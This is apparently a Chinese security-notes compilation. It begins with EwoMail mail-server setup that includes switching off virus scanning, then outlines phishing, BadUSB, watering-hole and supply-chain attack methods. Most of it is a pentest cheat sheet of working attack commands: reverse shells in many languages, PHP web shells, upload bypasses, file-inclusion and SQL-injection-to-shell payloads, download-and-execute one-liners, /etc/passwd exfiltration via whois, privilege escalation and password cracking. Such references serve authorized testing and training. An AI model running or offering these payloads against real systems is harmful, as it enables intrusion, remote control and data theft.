![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMh12G2EBvn49zE47v%2F-MUMjHGlrzq43CyBgs-t%2Fimage-0e1132d1.png?alt=media\&token=0da3ed51-4b9a-467f-91d7-e8d5964cdf4c)

在文件尾部加上该行参数

~~`@bypass_virus_checks_maps= (1);`~~

最后按下 esc 键，输入：wq 保存

```
修改文件（参考上面的例子操作命令修改）
vim /usr/lib/systemd/system/amavisd.service
在 Wants=clamd@amavisd.service 前面加上#符号
保存文件
```

修改后

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMjplr1hRaTnWXxr_d%2F-MUMk1XAexCx1KTTwfK2%2Fimage-7b479e24.png?alt=media\&token=49825732-e21a-41f2-ab9f-52b6a3649825)

输入以下命令即可完成杀毒软件的关闭

```
systemctl daemon-reload
systemctl stop clamd@amavisd
systemctl disable clamd@amavisd
systemctl restart amavisd
```

## 0x07数据备份与还原

EwoMail 主要目录在/ewomail，相关的数据与文件都存放在该目录。

> 数据备份

备份 ewomail 数据库，相关数据库备份操作可百度 MySQL 数据库操作

备份目录/ewomail/mail

> 数据还原

无论你在原有 EwoMail 或新安装的 EwoMail，都可以还原。

将备份的数据库覆盖 MySQL 的 ewomail 数据库

将备份的目录/ewomail/mail，覆盖回去。

&#x20;执行下面的命令

```
chown -R vmail:vmail /ewomail/mail
systemctl restart dovecot
```

### apache/nginx

1.05 版本开始

> nginx

默认绑定 80 端口，需手动启动。

可以利用 nginx 配置 php-fpm 或 apache，php-fpm 默认端口 9000，需手动启动。

配置目录：/ewomail/nginx

启动命令：

```
service nginx start
```

php-fpm 启动命令：

```
service php-fpm start
```

> apache

取消 apache 的 80 端口，管理邮箱后台与 webmail 保留原来的端口。

配置目录：/ewomail/apache

启动命令：

```
service httpd start
```

### 数据管理

为了安全，可以关闭或更换端口

登录后 ewomail 为邮箱的数据库

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMjplr1hRaTnWXxr_d%2F-MUMkFQnd3Zs4RdkR4TW%2Fimage-a9452aeb.png?alt=media\&token=f88a916b-0bb8-424e-943e-74ecf221c17d)

#### **数据库表说明：**

| 表                 | 说明     |
| ----------------- | ------ |
| i\_admin          | 是否管理员  |
| i\_admin\_log     | 操作日志   |
| i\_admin\_menu    | 角色表    |
| i\_domains        | 邮箱域名   |
| i\_mail\_config   | 邮箱系统配置 |
| i\_quota          | 邮箱账号   |
| i\_system\_config | 系统配置   |
| i\_users          | 邮箱账号密码 |

### 忘记密码

管理员默认账号：admin

&#x20;默认密码：ewomail123

> 忘记管理员

如果忘记管理员密码，需要进入数据库修改。

查看数据库密码

进入服务器执行命令：cat /ewomail/config.ini 红色部分为 MySQL root 的密码

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMjplr1hRaTnWXxr_d%2F-MUMkUTxArK7r4O53HE_%2Fimage-9a9b308c.png?alt=media\&token=fb25be37-178d-4641-a1f2-b7b347f466ec)

<http://服务器> IP:8020 phpmyadmin 页面

打开 ewomail 数据库，找到 i\_admin 表，password 栏目为密码，使用 [MD5 解密工具](https://link.ld246.com/forward?goto=https%3A%2F%2Fwww.somd5.com%2F)解密可查看密码，然后使用账号和密码登录即可。

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMjplr1hRaTnWXxr_d%2F-MUMkgLxP2p3hCO5W8nZ%2Fimage-91beb340.png?alt=media\&token=dc6f39af-7be9-4a50-857f-ad8f2ce1a3d5)

![](https://3720283288-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFJRZX6Th5SswHpXXMy%2F-MUMjplr1hRaTnWXxr_d%2F-MUMkjoVbCwCL_JZwOpi%2Fimage-853c929a.png?alt=media\&token=94346432-8ce1-440c-b56e-8b0a100a8018)

## 0x08重装与卸载

1、重装需要重新安装系统，然后按照教程来安装。

2、卸载，因为依赖的组件比较多，所以卸载后再安装会有相关冲突，所以不能再次重装。

## 更多配置请查看官方文档：

[http://doc.ewomail.com](https://link.ld246.com/forward?goto=http%3A%2F%2Fdoc.ewomail.com)


# XSS平台

{% embed url="<https://github.com/bit4woo/passmaker>" %}

{% embed url="<https://github.com/78778443/xssplatform>" %}


# 社工方案

## 鱼叉攻击（邮件）

### 投递文案策划

#### **目标喜好分析**

#### **目标近期活动分析**

#### **钓鱼文案编写**

### 邮件html模板制作

### 发件人地址伪装

#### **同服邮箱账号注册**

#### **相似域名注册：EvilURL**

#### **发件人伪造：swaks、代发api**

### 邮件安全网关绕过

#### **防欺骗能力检测：SpoofCheck**

#### **钓鱼连接检测绕过：白名单域名URL跳转漏洞**

#### **发送频率控制**

#### **高信誉邮件代发服务**

### 钓鱼邮件批量投递管理系统：FiercePhish、Gophish、king-phisher

## 现场投递

### 无线网络攻击

#### **无线密码破解：NetHunter、万能钥匙**

#### **流量劫持注入：BDFProxy**

### Badusb HID攻击

#### **硬件选择：ps2303芯片U盘、树莓派zero w、Teensy开发板、其他**

#### **固件程序：P4wnP1、Psychson、USB-Rubber-Ducky、360GhostTunnel**

### 存储介质攻击：感染木马文件的光盘、U盘、移动硬盘

### 物理入侵：ID卡伪造、门禁破解、角色扮演、身份伪装

## 水坑攻击

### 常用网站挂马

#### **行业、组织网站挂马：网站、论坛、博客**

### 开放目录挂马

#### **行业、组织开放目录挂马：网盘、共享目录**

### 浏览器攻击框架

#### **Beef**

#### **Browsersploit**

## 供应链攻击

### 通用软件供应链攻击

#### **软件下载/更新源劫持**

**安装源攻击：pip/apt-get源劫持**

开发工具后门：案例xcodeGhost

运维工具后门：案例XshellGhost、putty

**破解、汉化软件后门**

**刷票、翻墙、视频播放工具后门**

#### **基础设施后门利用**

**网络设备后门**

**物联网iot设备后门**

### 软件外包商攻击

#### **源代码攻击（svn、补丁服务器）**

#### **第三方调用资源攻击（组件库、js库、js广告代码）**


# 武器库


# 漏扫爬虫

{% embed url="<https://github.com/jaeles-project/gospider>" %}

{% embed url="<https://github.com/0Kee-Team/crawlergo>" %}

{% embed url="<https://github.com/chaitin/rad>" %}


# 漏扫选择

{% embed url="<https://github.com/chaitin/xray>" %}

{% embed url="<https://github.com/gobysec/Goby>" %}


# 渗透备忘录

Convenient commands for your pentesting / red-teaming engagements, OSCP and CTFs.

## 探测 / 枚举

### 从Nmap扫描中获取在线的IP

```
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips
```

### 简单的端口探活

```
for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done
```

### DNS 查找, 区域变化& 暴力破解

```
whois domain.com
dig {a|txt|ns|mx} domain.com
dig {a|txt|ns|mx} domain.com @ns1.domain.com
host -t {a|txt|ns|mx} megacorpone.com
host -a megacorpone.com
host -l megacorpone.com ns1.megacorpone.com
dnsrecon -d megacorpone.com -t axfr @ns2.megacorpone.com
dnsenum domain.com
nslookup -> set type=any -> ls -d domain.com
for sub in $(cat subdomains.txt);do host $sub.domain.com|grep "has.address";done
```

### 端口 Banner 信息获取

```
nc -v $TARGET 80
telnet $TARGET 80
curl -vX $TARGET
```

### NFS 共享文件服务

列出NFS共享目录。. 如果'rw,no\_root\_squash'是现在的状态, no\_root\_squash 登入 NFS 主机使用分享目录的使用者，如果是 root 的话，那么对于这个分享的目录来说，他就具有 root 的权限

```
showmount -e 192.168.110.102
chown root:root sid-shell; chmod +s sid-shell
```

### Kerberos 枚举

```
# users
nmap $TARGET -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='test'
```

### HTTP 暴力破解 & 漏洞扫描

```
target=10.0.0.1; gobuster -u http://$target -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 150 -l | tee $target-gobuster
target=10.0.0.1; nikto -h http://$target:80 | tee $target-nikto
target=10.0.0.1; wpscan --url http://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
```

### RPC / NetBios / SMB

```
rpcinfo -p $TARGET
nbtscan $TARGET
​
#list shares
smbclient -L //$TARGET -U ""
​
# null session
rpcclient -U "" $TARGET
smbclient -L //$TARGET
enum4linux $TARGET
```

### SNMP

```
# Windows 用户帐户
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.25
​
# Windows 运行程序
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.4.2.1.2
​
# Windows 主机名称
snmpwalk -c public -v1 $TARGET .1.3.6.1.2.1.1.5
​
# Windows 共享信息
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.3.1.1
​
# Windows 共享信息
snmpwalk -c public -v1 $TARGET 1.3.6.1.4.1.77.1.2.27
​
# Windows TCP 端口
snmpwalk -c public -v1 $TARGET4 1.3.6.1.2.1.6.13.1.3
​
# 软件名称
snmpwalk -c public -v1 $TARGET 1.3.6.1.2.1.25.6.3.1.2
​
#暴力破解共同体字符串
onesixtyone -i snmp-ips.txt -c community.txt
​
snmp-check $TARGET
```

### SMTP简单邮件传输协议

```
smtp-user-enum -U /usr/share/wordlists/names.txt -t $TARGET -m 150
```

### 活动目录

```
# 当前域信息
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
​
# 域信任
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
​
# 当前域森林信息
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
​
# 建立域森林信任关系
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
​
# 获得一个域的DCs
nltest /dclist:offense.local
net group "domain controllers" /domain
​
# 获取当前经过身份验证的会话的DC
nltest /dsgetdc:offense.local
​
# 从cmd shell获取域信任
nltest /domain_trusts
​
# 获取用户信息
nltest /user:"spotless"
​
# 获取当前经过身份验证的会话的DC
set l
​
# 获取认证用户的域名和DC
klist
​
# 获取所有登录会话。包括NTLM认证的会话
klist sessions
​
# 会话的kerberos票据
klist
​
# krbtgt缓存
klist tgt
​
#我在旧的Windows系统上是谁
set u
​
# 找到DFS共享与ADModule
Get-ADObject -filter * -SearchBase "CN=Dfs-Configuration,CN=System,DC=offense,DC=local" | select name
​
# 查找与ADSI的DFS共享
$s=[adsisearcher]'(name=*)'; $s.SearchRoot = [adsi]"LDAP://CN=Dfs-Configuration,CN=System,DC=offense,DC=local"; $s.FindAll() | % {$_.properties.name}
​
# 检查主机上是否运行假脱机程序服务
powershell ls "\\dc01\pipe\spoolss"
```

### 监听端口 (Powershell)

```
# 在端口443上启动监听器
$listener = [System.Net.Sockets.TcpListener]443; $listener.Start();
 
while($true)
{
    $client = $listener.AcceptTcpClient();
    Write-Host $client.client.RemoteEndPoint "connected!";
    $client.Close();
    start-sleep -seconds 1;
}
```

## 权限取得

### 使用限制壳

#### **Bash**

```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```

#### **Perl**

```
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

#### **URL-Encoded Perl: Linux**

```
echo%20%27use%20Socket%3B%24i%3D%2210.11.0.245%22%3B%24p%3D443%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%27%20%3E%20%2ftmp%2fpew%20%26%26%20%2fusr%2fbin%2fperl%20%2ftmp%2fpew
```

#### **Python**

```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

#### **PHP**

```
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```

#### **Ruby**

```
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

#### **Netcat without -e #1**

```
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 1234 > /tmp/f
```

#### **Netcat without -e #2**

```
nc localhost 443 | /bin/sh | nc localhost 444
telnet localhost 443 | /bin/sh | telnet localhost 444
```

#### **Java**

```
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
```

#### **XTerm**

```
xterm -display 10.0.0.1:1
```

#### JDWP RCE

```
print new java.lang.String(new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.Runtime().exec("whoami").getInputStream())).readLine())
```

### 使用限制壳

```
# 极少数情况下
ssh bill@localhost ls -l /tmp
```

```
nice /bin/bash
```

#### 交互式 TTY Shells

```
/usr/bin/expect sh
```

```
python -c ‘import pty; pty.spawn(“/bin/sh”)’
# 如果您没有访问shell的权限，则使用su作为另一个用户执行一个命令 Credit to g0blin.co.uk
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
```

#### 通过WWW上传表格上传/张贴文件

```
# POST 上传文件
curl -X POST -F "file=@/file/location/shell.php" http://$TARGET/upload.php --cookie "cookie"

# POST 上传二进制数据到web表单
curl -F "field=<shell.zip" http://$TARGET/upld.php -F 'k=v' --cookie "k=v;" -F "submit=true" -L -v
```

#### 通过PUT把文件放到网站主机上

```
curl -X PUT -d '<?php system($_GET["c"]);?>' http://192.168.2.99/shell.php
```

#### 生成有效载荷模式和计算偏移量

```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q $EIP_VALUE
```

#### 绕过File 上传

* file.php -> file.jpg
* file.php -> file.php.jpg
* file.asp -> file.asp;.jpg
* file.gif (contains php code, but starts with string GIF/GIF98)
* 00%
* file.jpg with php backdoor in exif (see below)
* .jpg -> proxy intercept -> rename to .php

#### 将PHP注入JPEG

```
exiv2 -c'A "<?php system($_REQUEST['cmd']);?>"!' backdoor.jpeg
exiftool “-comment<=back.php” back.png
```

#### 上传.htaccess 解释 .blah 成 .php

```
AddType application/x-httpd-php .blah
```

### 暴力破解密码

#### **使用Hydra破解Web表单**

```
hydra 10.10.10.52 http-post-form -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/list
```

#### **使用Hydra破解通用协议**

```
hydra 10.10.10.52 -l username -P /usr/share/wordlists/list ftp|ssh|smb://10.0.0.1
```

#### **HashCat开裂**

```
# 基于模式的暴力破解;
hashcat -a3 -m0 mantas?d?d?d?u?u?u --force --potfile-disable --stdout  

# 生成密码候选:wordlist + pattern;
hashcat -a6 -m0 "e99a18c428cb38d5f260853678922e03" yourPassword|/usr/share/wordlists/rockyou.txt ?d?d?d?u?u?u --force --potfile-disable --stdout

# 用internalMonologue生成NetNLTMv2，用hashcat破解
InternalMonologue.exe -Downgrade False -Restore False -Impersonate True -Verbose False -challange 002233445566778888800
# 生成的哈希
spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000

# 裂纹与hashcat
hashcat -m5600 'spotless::WS01:1122334455667788:26872b3197acf1da493228ac1a54c67c:010100000000000078b063fbcce8d4012c90747792a3cbca0000000008003000300000000000000001000000002000006402330e5e71fb781eef13937448bf8b0d8bc9e2e6a1e1122fd9d690fa9178c50a0010000000000000000000000000000000000009001a0057005300300031005c00730070006f0074006c006500730073000000000000000000' -a 3 /usr/share/wordlists/rockyou.txt --force --potfile-disable
```

#### 使用msfvenom产生有效载荷

```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.245 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
```

#### 从Linux编译代码

```
# Windows
i686-w64-mingw32-gcc source.c -lws2_32 -o out.exe

# Linux
gcc -m32|-m64 -o output source.c
```

#### **从Windows编译程序集**

```
# https://www.nasm.us/pub/nasm/releasebuilds/?C=M;O=D
nasm -f win64 .\hello.asm -o .\hello.obj

# http://www.godevtool.com/Golink.zip
GoLink.exe -o .\hello.exe .\hello.obj
```

#### **本地文件包含到Shell**

```
nc 192.168.1.102 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Host: 192.168.1.102
Connection: close

# Then send as cmd payload via http://192.168.1.102/index.php?page=../../../../../var/log/apache2/access.log&cmd=id
```

**本地文件包含:读取文件**

```
file:///etc/passwd

http://example.com/index.php?page=php://input&cmd=ls
    POST: <?php system($_GET['cmd']); ?>
http://192.168.2.237/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input
    POST: <?php system('uname -a');die(); ?>

expect://whoami
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=&cmd=id
http://10.1.1.1/index.php?page=data://text/plain,%3C?php%20system%28%22uname%20-a%22%29;%20?%3E

# ZIP Wrapper
echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;  
zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
http://example.com/index.php?page=zip://shell.jpg%23payload.php

# 循环遍历文件描述符
curl '' -H 'Cookie: PHPSESSID=df74dce800c96bcac1f59d3b3d42087d' --output -
```

**远程文件包含Shell: Windows + PHP**

```
<?php system("powershell -Command \"& {(New-Object System.Net.WebClient).DownloadFile('http://10.11.0.245/netcat/nc.exe','nc.exe'); cmd /c nc.exe 10.11.0.245 4444 -e cmd.exe\" }"); ?>
```

**SQL注入到Shell或后门**

```
# Assumed 3 columns
http://target/index.php?vulnParam=0' UNION ALL SELECT 1,"<?php system($_REQUEST['cmd']);?>",2,3 INTO OUTFILE "c:/evil.php"-- uMj
```

```
# sqlmap;post-捕获请求通过Burp代理通过保存项目到文件.
sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10
```

```
# 当xp_cmdshell可用时，netcat通过mssql注入反向shell
1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--
```

**SQLite注入到Shell或后门**

```
ATTACH DATABASE '/home/www/public_html/uploads/phpinfo.php' as pwn; 
CREATE TABLE pwn.shell (code TEXT); 
INSERT INTO pwn.shell (code) VALUES ('<?php system($_REQUEST['cmd']);?>');
```

**ms sql控制台**

```
mssqlclient.py -port 27900 user:password@10.1.1.1
sqsh -S 10.1.1.1 -U user -P password
```

**Upgradig非交互式Shell**

```
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/busybox sh
```

**Python输入代码注入**

```
__import__('os').system('id')
```

**本地枚举和权限升级**

**检查AppLocker策略**

```
Get-AppLockerPolicy -Local).RuleCollections
Get-ChildItem -Path HKLM:Software\Policies\Microsoft\Windows\SrpV2 -Recurse
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\
```

**Applocker:可写的Windows目录**

```
# list from https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```

**在Windows中找到可写的文件/文件夹**

```
$a = Get-ChildItem "c:\windows\" -recurse -ErrorAction SilentlyContinue
$a | % {
    $fileName = $_.fullname
    $acls = get-acl $fileName  -ErrorAction SilentlyContinue | select -exp access | ? {$_.filesystemrights -match "full|modify|write" -and $_.identityreference -match "authenticated users|everyone|$env:username"}
    if($acls -ne $null)
    {
        [pscustomobject]@{
            filename = $fileName
            user = $acls | select -exp identityreference
        }
    }
}
```

**检查是否启用了Powershell日志记录**

```
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
```

**检查WinEvent日志是否暴露了安全字符串**

```
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Select-Object -Property Message | Select-String -Pattern 'SecureString'
```

**检查WinEvent机器唤醒/休眠时间**

```
Get-WinEvent -FilterHashTable @{ ProviderName = 'Microsoft-Windows-Power-TroubleShooter'  ; Id = 1 }|Select-Object -Property @{n='Sleep';e={$_.Properties[0].Value}},@{n='Wake';e={$_.Properties[1].Value}}
```

#### 审计政策

```
auditpol /get /category:*
```

**检查PPL中是否运行LSASS**

```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
```

**使用ImmunityDebugger进行二进制开发**

**得到加载模块**

```
# 我们对没有保护、读取和执行的模块感兴趣
permissions
!mona modules
```

**查找JMP ESP地址**

```
!mona find -s "\xFF\xE4" -m moduleName
```

**破解ZIP密码**

```
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt bank-account.zip
```

**设置简单HTTP服务器**

```
# Linux
python -m SimpleHTTPServer 80
python3 -m http.server
ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:80
```

#### MySQL用户自定义功能权限升级

Requires raptor\_udf2.c and sid-shell.c or full raptor.tar:

{% file src="../../.gitbook/assets/sid-shell.c" %}

{% file src="../../.gitbook/assets/raptor\_udf2.c" %}

{% file src="../../.gitbook/assets/raptor.tar" %}

```
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```

```
use mysql;
create table npn(line blob);
insert into npn values(load_file('/tmp/raptor_udf2.so'));
select * from npn into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select do_system('chown root:root /tmp/sid-shell; chmod +s /tmp/sid-shell');
```

**码头工人特权Esclation**

```
echo -e "FROM ubuntu:14.04\nENV WORKDIR /stuff\nRUN mkdir -p /stuff\nVOLUME [ /stuff ]\nWORKDIR /stuff" > Dockerfile && docker build -t my-docker-image . && docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' && ./sh -c id && ./sh
```

**重新设置root密码**

```
echo "root:spotless" | chpasswd
```

**上传文件到目标机器**

**TFTP**

```
#TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp
service atftpd start

# Windows
tftp -i $ATTACKER get /download/location/file /save/location/file
```

**FTP**

```
# Linux: set up ftp server with anonymous logon access;
twistd -n ftp -p 21 -r /file/to/serve

# Windows shell: read FTP commands from ftp-commands.txt non-interactively;
echo open $ATTACKER>ftp-commands.txt
echo anonymous>>ftp-commands.txt
echo whatever>>ftp-commands.txt
echo binary>>ftp-commands.txt
echo get file.exe>>ftp-commands.txt
echo bye>>ftp-commands.txt 
ftp -s:ftp-commands.txt

# Or just a one-liner
(echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd
```

**CertUtil**

```
certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe
```

**PHP**

```
<?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?>
```

**Python**

```
python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"
```

**HTTP: Powershell**

```
powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); cmd /c nc.exe $ATTACKER 4444 -e cmd.exe" }
powershell -Command "& {(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe'); Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'" }
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/nc.exe','nc.exe')"; Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'"
powershell (New-Object System.Net.WebClient).DownloadFile('http://$ATTACKER/file.exe','file.exe');(New-Object -com Shell.Application).ShellExecute('file.exe');

# download using default proxy credentials and launch
powershell -command { $b=New-Object System.Net.WebClient; $b.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $b.DownloadString("http://$attacker/nc.exe") | Out-File nc.exe; Start-Process nc.exe -NoNewWindow -Argumentlist '$ATTACKER 4444 -e cmd.exe'" }
```

**HTTP: VBScript**

Copy and paste contents of [wget.vbs](https://github.com/mantvydasb/Offensive-Security-Cheatsheets/blob/master/wget-cscript) into a Windows Shell and then:

```
cscript wget.vbs http://$ATTACKER/file.exe localfile.exe
```

**HTTP: Linux**

```
wget http://$ATTACKER/file
curl http://$ATTACKER/file -O
scp ~/file/file.bin user@$TARGET:tmp/backdoor.py
```

**NetCat**

```
# Attacker
nc -l -p 4444 < /tool/file.exe

# Victim
nc $ATTACKER 4444 > file.exe
```

**HTTP: Windows”调试。exe”方法**

```
# 1. In Linux, convert binary to hex ascii:
wine /usr/share/windows-binaries/exe2bat.exe /root/tools/netcat/nc.exe nc.txt
# 2. Paste nc.txt into Windows Shell.
```

**HTTP: Windows BitsAdmin**

```
cmd.exe /c "bitsadmin /transfer myjob /download /priority high http://$ATTACKER/payload.exe %tmp%\payload.exe&start %tmp%\payload.exe
```

**Wscript脚本代码的下载和执行**

{% tabs %} {% tab title="cmd" %}

```
echo GetObject("script:https://bad.com/code.js") > code.js && wscript.exe code.js
```

{% endtab %}

{% tab title="code.js" %}

```
<?xml version="1.0"?>
<package>
<component id="PopCalc">
<script language="JScript">
    <![CDATA[
    var r = new ActiveXObject("WScript.Shell").Run("calc"); 
    ]]>
</script>
</component>
</package>
```

{% endtab %} {% endtabs %}

**域名查询服务数据漏出**

```
# attacker
nc -l -v -p 43 | sed "s/ //g" | base64 -d
# victim
whois -h $attackerIP -p 43 `cat /etc/passwd | base64`
```

#### 数据泄露

```
cancel -u "$(cat /etc/passwd)" -h ip:port
```

**远程登录命令数据漏出**

```
rlogin -l "$(cat /etc/passwd)" -p port host
```

**Bash平扫**

```
#!/bin/bash
for lastOctet in {1..254}; do 
    ping -c 1 10.0.0.$lastOctet | grep "bytes from" | cut -d " " -f 4 | cut -d ":" -f 1 &
done
```

#### 在Python中使用1字节键强制XOR'ed字符串

```
encrypted = "encrypted-string-here"
for i in range(0,255):
    print("".join([chr(ord(e) ^ i) for e in encrypted]))
```

**生成坏字符串**

```
# Python
'\\'.join([ "x{:02x}".format(i) for i in range(1,256) ])
```

```
# Bash
for i in {1..255}; do printf "\\\x%02x" $i; done; echo -e "\r"
```

#### 将Python转换为Windows可执行文件(.py ->. exe )

```
python pyinstaller.py --onefile convert-to-exe.py
```

**使用NetCat进行端口扫描**

```
nc -nvv -w 1 -z host 1000-2000
nc -nv -u -z -w 1 host 160-162
```

**使用Masscan进行端口扫描**

```
masscan -p1-65535,U:1-65535 10.10.10.x --rate=1000 -e tun0
```

#### 利用脆弱的Windows服务:薄弱的服务权限

```
# 在输出中查找SERVICE ALL访问
accesschk.exe /accepteula -uwcqv "Authenticated Users" *

sc config [service_name] binpath= "C:\nc.exe 10.11.0.245 443 -e C:\WINDOWS\System32\cmd.exe" obj= "LocalSystem" password= ""
sc qc [service_name] (to verify!)
sc start [service_name]
```

#### 查找为给定用户显式设置的文件/文件夹权限

```
icacls.exe C:\folder /findsid userName-or-*sid /t
